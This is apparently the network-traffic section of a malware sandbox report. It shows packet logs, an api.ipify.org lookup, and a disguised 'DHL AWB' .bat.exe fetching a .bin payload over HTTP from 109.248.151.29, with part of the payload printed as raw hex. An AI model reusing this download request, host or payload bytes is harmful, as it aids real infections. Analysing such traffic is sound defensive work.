                                          Jul 1, 2024 12:26:05.526447058 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526458025 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526468992 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526479959 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526490927 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526500940 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526513100 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526546001 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526549101 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526603937 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526616096 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526628017 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526640892 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526761055 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526761055 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526789904 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526806116 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526825905 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526837111 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526848078 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526859045 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526886940 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526958942 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.527056932 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.527056932 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.527071953 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.527086020 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.527115107 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.527203083 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.527396917 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.527396917 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.527396917 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767172098 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767270088 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767283916 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767296076 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767388105 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767402887 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767414093 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767504930 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767504930 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767513037 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767527103 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767545938 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767556906 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767597914 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767674923 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767674923 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767721891 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767777920 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767790079 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767801046 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767812014 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767839909 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767847061 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.767899990 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767911911 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767923117 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767934084 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.767961979 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768016100 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768040895 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768040895 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768086910 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768148899 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768162012 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768181086 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768186092 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768186092 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768202066 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768213034 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768341064 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768356085 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768399954 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768410921 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768421888 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768443108 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768454075 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768465042 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768500090 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768526077 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768526077 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768699884 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768702030 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768702030 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768706083 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768706083 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768712997 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768842936 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768867016 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768867016 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.768898010 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768909931 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768920898 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768932104 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.768959999 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769021988 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769032955 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769043922 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769085884 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.769088984 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769145966 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769156933 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769167900 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769212961 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769253969 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.769268036 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769279957 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.769424915 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.769593954 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.769593954 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011292934 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011307955 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011343956 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011440992 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011456013 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011475086 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011487007 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011498928 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011579037 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011636019 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011656046 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011667967 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011678934 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011719942 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011749029 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011749029 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011749029 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011796951 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011804104 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011816025 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011826992 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011846066 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011857033 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011966944 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011966944 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011966944 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.011979103 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.011991024 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012031078 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012042046 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012053013 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012072086 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012084961 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012095928 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012134075 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012140036 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012248993 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012259960 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012270927 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012290001 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012300968 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012311935 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012340069 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012340069 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012340069 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012346983 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012357950 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012403011 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012449980 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012501955 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012509108 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012509108 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012626886 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012639046 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012712002 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012770891 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012783051 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012794018 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012804985 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012836933 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012847900 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.012891054 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012902021 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.012998104 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013009071 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013019085 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013019085 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013020992 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013041973 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013052940 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013063908 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013075113 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013103962 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013114929 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013151884 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013163090 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013195038 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013210058 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013335943 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013358116 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013387918 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013400078 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013525009 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013638020 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013649940 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013660908 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013665915 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013669014 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:06.013838053 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013838053 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:06.013838053 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:09.316488981 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:09.316508055 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:09.316737890 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:09.351079941 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:09.351095915 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:09.605083942 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:09.605375051 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:09.606925964 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:09.606946945 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:09.607424021 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:09.659235954 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:10.295784950 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:10.336179972 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:10.442116976 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:10.442177057 CEST44349739104.26.12.205192.168.11.20
                                          Jul 1, 2024 12:26:10.442303896 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:26:10.442851067 CEST49739443192.168.11.20104.26.12.205
                                          Jul 1, 2024 12:27:54.308214903 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:27:54.550061941 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:27:54.550318003 CEST4973880192.168.11.20109.248.151.29
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 12:26:09.171127081 CEST5912853192.168.11.201.1.1.1
                                          Jul 1, 2024 12:26:09.291146994 CEST53591281.1.1.1192.168.11.20
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 1, 2024 12:26:09.171127081 CEST192.168.11.201.1.1.10x8759Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 1, 2024 12:26:09.291146994 CEST1.1.1.1192.168.11.200x8759No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Jul 1, 2024 12:26:09.291146994 CEST1.1.1.1192.168.11.200x8759No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Jul 1, 2024 12:26:09.291146994 CEST1.1.1.1192.168.11.200x8759No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          • api.ipify.org
                                          • 109.248.151.29
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.2049738109.248.151.298010220C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 12:26:04.558748007 CEST177OUTGET /MnBzHGsyHle133.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 109.248.151.29
                                          Cache-Control: no-cache
                                          Jul 1, 2024 12:26:04.801783085 CEST1289INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Sun, 30 Jun 2024 21:57:19 GMT
                                          Accept-Ranges: bytes
                                          ETag: "beae8f7a38cbda1:0"
                                          Server: Microsoft-IIS/8.5
                                          Date: Mon, 01 Jul 2024 10:26:04 GMT
                                          Content-Length: 239680
                                          Data Raw: 4e d0 41 27 54 0c 32 af cc 89 0c 69 24 38 f6 fa ef d5 cb db f2 6c ba 78 d5 b4 14 dc 8c c7 d4 d7 21 19 e0 78 fd d0 5b 75 88 a9 45 e1 02 03 f0 17 2e 65 9e c2 80 35 42 a4 b4 d3 e1 26 ca 75 2c 81 3a 30 95 5e e9 a9 ed 78 13 61 b0 18 99 e4 fb 97 61 3f 8d f9 1c f6 1f 35 67 e2 af fb e7 ab 4b 13 35 17 da 13 cb 3c aa ea e8 81 e7 3d a4 a9 af 20 39 ab 26 a4 e3 fd 90 27 86 78 79 65 48 15 90 95 25 c9 44 c6 e5 1b 0b bd 77 3e b1 43 c8 e6 79 d7 ae e6 d8 d8 7f 0b 28 b4 41 39 bd 4c f7 d5 17 70 72 f7 c7 34 46 c5 b2 00 c1 68 b7 8e e7 56 2f e5 64 1c 2a e2 d8 a7 a8 e2 0e 74 46 7f 53 5e dd 92 15 5f 2c 31 1a c9 f7 ea af 88 88 31 f9 12 a3 18 bf e6 9b e9 53 b9 83 96 04 f9 61 30 8a 97 f5 e2 8b 26 31 23 bb f8 09 f6 2b aa 5b d0 58 50 49 25 9a c5 6d 45 c4 3f 24 ff b3 5b 7c 1e 87 e3 ce 2a a8 f2 b6 f6 4c 19 8a 84 a2 99 a8 41 5e 6d 6a a4 4e 77 33 fa f6 05 a5 5f 1b 31 82 48 0e 5d 9c 70 d2 bb 15 0f 41 8b 3f 5d c5 46 61 ab 8e e7 bd 76 fa 90 07 6e 5f a1 ad bc a2 31 31 a3 68 6f a6 1d 7f 59 60 71 de dd b7 ed 6c 23 d7 06 10 c7 c4 e7 9c 08 [TRUNCATED]
                                          Data Ascii: NA'T2i$8lx!x[uE.e5B&u,:0^xaa?5gK5<= 9&'xyeH%Dw>Cy(A9Lpr4FhV/d*tFS^_,11Sa0&1#+[XPI%mE?$[|*LA^mjNw3_1H]pA?]Favn_11hoY`ql#ZZzTuR2R{yS!dn$ k7X"U0 $sRnUwmp60j{7lt8)KKfl5Gy8JesMapBU+ToTt8`jCL:rp%^tjr'.rr6T3a:"PC1CF5J/t.7}4<ad/54!s@pN-O-@pYT*OZ(i`gV.1[4nPoK(TNU6V}:&t_xqCi+< Pzr5nZ3:tL9pv'Uz7fXm}<5}N$mg+@5SA_(;-QepC^,?:n5,'b/Y|lk~9#'Z^AwULXif$Q+j=i2fclgsn&fjv{YYdF/R [TRUNCATED]
                                          Jul 1, 2024 12:26:04.801820993 CEST1289INData Raw: bf 41 42 de f1 45 5e a0 85 7a 67 51 da e5 47 d1 6d d6 b0 ea a4 0d 7f 73 37 4e 77 0f 89 4a 24 55 88 20 6f 1e a0 e3 c2 2d 14 82 9b cc 12 d5 53 23 95 76 c6 6c 34 b3 70 11 b2 88 be 3d 54 aa c7 7a 34 ef bf ef 2c 29 7c 4e a5 19 67 c8 3d a5 45 0c 4a 3b
                                          Data Ascii: ABE^zgQGms7NwJ$U o-S#vl4p=Tz4,)|Ng=EJ;%Ox$e1YR ?s^*aEs;+Yrm5}[VubQwy^[:uA#^,c_:ZadvS]"%BcGTBMh6;;!pm\J*
                                          Jul 1, 2024 12:26:04.801851034 CEST1289INData Raw: 7c a4 77 6b 7e e3 10 20 04 b5 f9 5e c3 d8 5b fe e2 d3 37 53 03 07 df 36 ba dc e5 05 07 cb 9f ff a9 88 2c 6e 7e d7 90 0f 8c 9d f8 6d d8 d0 3a 63 ab 60 39 c1 27 e0 ed 34 66 1f b2 a0 a0 d0 a0 8c cf aa 55 2d 73 72 e4 ac 4b f4 76 fa b1 8e c2 02 fa 8b
                                          Data Ascii: |wk~ ^[7S6,n~m:c`9'4fU-srKvd:R^3!AANs%sh75[agmc.!WysIEO\!dUt7r3@Vk(mIDye~!1YR"[Z?sR"nNE
                                          Jul 1, 2024 12:26:04.801911116 CEST1289INData Raw: 5c a4 40 b8 11 dc f7 42 1d cd 38 8e 49 c9 97 3b 0b 16 86 e4 cb da 83 1a 59 ec e8 41 92 9d bf c1 bf 4a 75 f0 61 c9 4c 95 53 5a 12 47 51 b1 4c f9 e6 f5 7d 91 81 2a d2 9e 06 71 ad e8 2d 0c b1 e6 4d 72 e5 3b f9 a5 c1 f5 1f 52 51 42 ed 55 5f ff b8 7c
                                          Data Ascii: \@B8I;YAJuaLSZGQL}*q-Mr;RQBU_|@9-gs/pbt#7(;99P!}rgYvc@\KZ5Yw0Uu#E<Md f7U.Qlp&UUxgqzd/%"E62G
                                          Jul 1, 2024 12:26:05.043540001 CEST1289INData Raw: 8d 08 0d d7 5d 7d a4 5a 4d cd 28 8c 59 e5 96 ad 37 18 b8 0c 58 66 46 74 b3 f5 b3 da 20 16 94 3c 9a 1a 34 b6 5c d2 48 18 16 83 15 72 ae c6 35 55 90 6a 39 7d a3 58 d5 50 20 04 d1 6c 46 5b 2c 48 e8 7a 34 86 b9 56 9a d6 2a 85 b7 b2 cc 7f 61 ad 28 38
                                          Data Ascii: ]}ZM(Y7XfFt <4\Hr5Uj9}XP lF[,Hz4V*a(8rX.8c@/)N@ee@A`4M9pxqZo@7`cSYQ8y&{~gU;sS_Vo-?"pfv^V.Mr#
                                          Jul 1, 2024 12:26:05.043580055 CEST1289INData Raw: ea 10 22 ff 7f 03 2a e4 8b 0f 31 c3 72 c8 b6 7d bc a9 34 36 b2 5f 3d eb 16 cf b7 d8 61 3a 52 2e 91 8a 99 d4 9e f0 d4 f1 41 a2 d4 40 46 e7 01 3b f1 5f 6a ec a3 2d 74 d5 39 3f f7 36 fa 5d 0e c2 bd 92 fd b1 04 0a 60 b3 c3 b4 64 d1 d1 f2 8a 9f 15 bd
                                          Data Ascii: "*1r}46_=a:R.A@F;_j-t9?6]`d4$!sj@pS6,R7oF\[Vx+Yd48TeUd*FQh2^5UNv=}S .YT[Dv5xFaIO(8-Y3Z5?I/$
                                          Jul 1, 2024 12:26:05.043620110 CEST1289INData Raw: 8c 75 2d e9 bc 3c fe 6d b6 d8 23 db 73 36 30 f9 c4 61 ba 28 df 33 e2 37 92 9c d6 6c 38 b6 05 e3 25 d7 e7 95 34 3f a7 66 f0 3d 29 6f e3 5f e4 3f 81 af d9 84 fb cf 3a 4a 54 a1 f7 a8 97 66 fd 16 ad 8d ac c3 a9 6d 13 d5 ff ad ad d3 a2 7b 70 a8 42 ed
                                          Data Ascii: u-<m#s60a(37l8%4?f=)o_?:JTfm{pB+TSt>qqciO N:V0rp-8b,r7G12a,PCS@F6_-T!7<hAd0?C/sl@NX
                                          Jul 1, 2024 12:26:05.043642998 CEST1289INData Raw: 5f 11 b1 98 48 0c 59 ae e7 d1 bb 75 27 72 9b 3f 57 45 5d 71 ab 8a 85 8d 75 fa e0 87 72 4f a1 a9 ce f4 32 31 d3 e8 72 a6 1d 53 97 1f 72 8d ad 37 f3 6c e3 d0 74 c6 c1 c4 97 1c 17 f1 c8 5e 6a f0 88 5a 0a 7c 46 52 f4 94 b2 72 5e fd 10 fc 69 03 79 23
                                          Data Ascii: _HYu'r?WE]qurO21rSr7lt^jZ|FRr^iy#+#djVkoG"RpRw-lmXp2Bb33Fg/3?F)o5TzFeJm+?zp+T[t*-`[hMt?rk,
                                          Jul 1, 2024 12:26:05.043663979 CEST1289INData Raw: ff 36 54 9d 2f 68 b7 7d 1f 2e e1 a5 51 6c 49 c9 66 e1 21 f9 ae a3 19 82 cb 05 73 4e 79 fa a6 a5 c8 38 74 46 7f ad 5f e4 89 45 1a 2c cf 5a cc f4 c2 03 2e 49 5e 75 51 a3 18 be 18 95 e9 b3 99 92 97 0f f8 94 3e 86 09 f6 1c 87 22 31 03 9b f8 09 f6 ab
                                          Data Ascii: 6T/h}.QlIf!sNy8tF_E,Z.I^uQ>"1aXpIn6?dMuu*Lt\^mjZON1Za?]9CxbD1;]fo=IcqslVcZXpR2RT{ sS!'b$)p6;Xkz
                                          Jul 1, 2024 12:26:05.043694019 CEST1289INData Raw: 37 66 25 2c 08 18 a6 79 23 7f 39 22 5a 48 f9 78 71 20 28 e1 2d 25 9d db 68 85 15 68 fd c7 ea 74 f8 53 51 b9 fe 32 6e 87 a0 74 6a 05 5e 14 a8 d4 67 17 61 b0 e6 6a 1a fb 69 d0 3e 8d d1 52 f6 1f 3f 53 f0 af fb e5 55 45 11 35 37 de 13 cb 3c 54 e4 eb
